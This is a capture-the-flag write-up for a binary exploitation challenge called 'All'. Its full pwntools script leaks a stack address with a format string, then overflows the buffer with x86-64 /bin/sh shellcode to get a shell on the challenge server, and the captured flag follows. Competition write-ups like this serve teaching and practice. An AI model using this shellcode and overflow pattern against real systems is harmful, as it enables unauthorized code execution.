All
- Score: 181
- Technique:
FmtStrShellcode
What if I just.... put ALL the vulnerabilities in there? With no mitigations?
Script
from pwn import *
elf = context.binary = ELF('./all')
r = remote('all.chal.cyberjousting.com', 1348)
# leak stack
# for i in range(0,30):
# r.sendline(b'AAAA %%%d$p' % i)
# print("%d - %s" % (i, r.recvuntil(b'\n').strip()))
main = elf.symbols.main
r.sendline(b'%10$p')
leaked = int(r.recvuntil(b'\n').strip(),16)
buf = leaked - 0x40
shell = b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
ret = next(elf.search(asm('ret')))
payload = b'quit\x00' + shell + b'\x90' * (32 - len(shell) - 5) + b'B'*8 + p64(ret) + p64(buf+5)
r.sendline(payload)
r.interactive()
Flag
byuctf{too_many_options_what_do_I_chooooooose}